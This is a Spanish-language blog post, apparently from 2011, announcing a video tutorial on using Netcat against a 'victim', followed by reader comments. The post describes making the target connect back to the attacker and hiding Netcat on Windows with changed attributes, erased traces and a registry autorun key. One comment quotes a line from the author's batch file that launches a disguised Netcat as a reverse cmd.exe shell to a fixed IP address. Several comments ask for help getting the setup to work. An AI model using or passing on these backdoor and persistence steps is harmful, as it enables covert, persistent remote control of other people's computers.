Seguridad: Netcat II


En este vídeo, continuo con la “navaja suiza”, el Netcat, y os explico aunque no sin algún error corregido, como hacer que sea nuestra posible victima la que inicie la comunicación con nosotros y ademas como ocultar al Netcat en la maquina atacada de forma que se auto-ejecute y no sea visible por cualquier usuario…os enseño a ocultarlo en una carpeta de Windows, cambiarle los atributos, borrar todo rastro posible y crear una llave en el registro de forma que nuestra victima lo autoejecute siempre al inicio de la sesión…..de todas formas aun me queda en próximos tutoriales enseñaros a como rastrear puertos y elegir a nuestra victima segun ciertos criterios….

Para los interesados os dejo un archivo comprimido con los fuentes en su interior para que hagais prácticas con ellos….

Ficheros de Netcat usados en la práctica

MD5: 8dd4f8d4a7a2f4ac9c8b20fd36ce87af

SHA1: ae785dd3a022aeb5907454d49a117111a22d4c90

…Intentare continuar este tema más adelante….

Anuncios
  1. juan
    28/11/2012 en 11:37 am

    hola, una pregunta. intenté hacer le netcat entre una máquina virtual y mi máquina real.
    en la máquina virtual pongo el siguiente comando: “c:> nc -l -p 5777” , y en mi máquina real pongo lo siguiente : “~$ nc 192.168.1.30 5777” y me sale el siguiente error :
    “(UNKNOWN) [192.168.1.30] 5777 (?) : No route to host” y nosé porque me sale eso , me podrías ayudar porfavor, porque he hecho todos los pasos como los pusiste en tu primer video. gracias.

    • 29/11/2012 en 9:32 am

      Eso te sale porque la maquina virtual esta rechazando por defecto las conexiones entrantes…debes elegir el correcot modo en la red de la maquina virtual al configurarla. Hay un archivo en VirtualBox que permite las conexiones entrantes y otro en linux que permite la replica de pings o cualquier otro comando de red en este sistema. Debes habilitarlos ambos, para poder hacer las pruebas. Luego dejarlos tal y como estaban. Por cierto ahora no estoy con esos temas ya que estoy liado con las webs que estoy terminando, asi que cuando pueda revisare la información y si puedo te lo explico con mas detenimiento. Por ahora lo siento. Pero revisa bien el video, seguro que se te escapa algun paso de los que yo di en su momento. Un saludo.

      • 29/11/2012 en 9:33 am

        Tendré que revisar el video de nuevo, hace tiempo que no toco esos temas. Ya que ahora estoy con la programación de webs, pero en cuando tenga tiempo, te lo miro y te lo confirmo. Un saludo. Gracias.

  2. juan
    26/11/2012 en 6:24 pm

    Si, está bien eso si entiendo. tu atacas desde un linux hacia un windows server 2003, entonces el atacante sería : LINUX
    y la víctima sería: WINDOWS SERVER 2003. en tú video dice aproximadamente en el minuto 2:40 de tu segundo video de NETCAT bien claro “pongo la IP nuestra, porque como tú dices: lo que queremos es que la víctima nos llame a nosostros y no nosotros llamar a la víctima” y por lógica entonces me hace deducir que esa ip 192.168.1.33 es la ip de tu máquina física osea de la máquina atacante que es la de LINUx y no la de tu máquina virtual. para salir de dudas me podrias decir la ip 192.168.1.33 de que máquina es de tu LINUX o de tu WINDOWS SERVER 2003?

  3. juan
    26/11/2012 en 1:46 am

    Hola , me gustó tu tutorial, está muy bueno . Pero me quedó una duda?
    en el archivo “copiar.bat”, en la línea que dice : “start /B %SystemRoot%\System32\update -d -e cmd.exe 192.168.1.34 5777”
    la duda que me queda es que ip se debe poner ahi en de la ip : 192.168.1. cual ip de que inertfaz de tu pc se debe poner la de tu ethernet
    o la de tu wiifi, porque yo tengo internet wifi y cuando a las interfaces de mi pc ne la que es wifi no sales nada por ser DHCP , pero en la inerfaz ethernet si sale las ip’s pero cuando intento hacerle ping a la ip de mi interfaz ethernet me sale host inaccesible , creo q es porque no tengo conectado nigún cable , solo estoy conectado por WIFI pero la interfaz WIFI no tiene ip fija por ser DCHCP como te digo.

    entonces nosé que IP ponerle hay , me podrias ayudar y decirme que ip debería ponerle en vez de tu ip . gracias.

    • 26/11/2012 en 10:49 am

      La ip que se pone es la de tu victima…ya este conectada por wifi o por cable. Da exactamente igual. Para el programa o el comando no le importa ni que dispositivo, ni la red, ni el sistema opertivo, solo necesita saber la ip de la victima. Da igual que sea incluso una ip dada por una maquina virtual, el caso es averiguar cual es la ip y que por supuesto no este detrás de ningún firewall, para que no te rechaze ninguna solicitud entrante a esa ip, o tenga puesto en el router una limitación por MAC. Espero que tu respuesta este solucionada. Un saludo y gracias.

  4. jesus
    20/04/2012 en 11:39 pm

    hola podrias resubir el archivo gracias de antemano un saludo

  5. jcernuda95
    26/03/2012 en 10:49 pm

    POdrias resubir los ficheros??

    • 01/04/2012 en 1:52 pm

      Jaime, perdona mi tardanza en contestar, pero estoy liado con otras cosas. Los archivos ciertamente han sido borrados de MediaFire debido a las nuevas leyes aplicadas a las descargas ilegales. Por lo que no pude recuperarlos a tiempo de los servidores antes de que me bloquearan la cuenta entera. Estoy ocupadisimo, pero intentare hacerlos de nuevo y subirlos a mi cuenta de Dropbox. Tendras que tener paciencia, ya que los archivos son de creacion propia y no los encontraras por ningun lado. Un saludo.

  6. 13/10/2011 en 1:29 am

    genio !

  7. 02/10/2011 en 2:19 am

    esta genial el tutorial, me encantaria saber mas

  8. Fox
    15/08/2011 en 11:25 pm

    Interesante Video!
    Eres un Master, muchos saludos de Chile estimado.

  1. No trackbacks yet.

Responder

Introduce tus datos o haz clic en un icono para iniciar sesión:

Logo de WordPress.com

Estás comentando usando tu cuenta de WordPress.com. Cerrar sesión / Cambiar )

Imagen de Twitter

Estás comentando usando tu cuenta de Twitter. Cerrar sesión / Cambiar )

Foto de Facebook

Estás comentando usando tu cuenta de Facebook. Cerrar sesión / Cambiar )

Google+ photo

Estás comentando usando tu cuenta de Google+. Cerrar sesión / Cambiar )

Conectando a %s

A %d blogueros les gusta esto: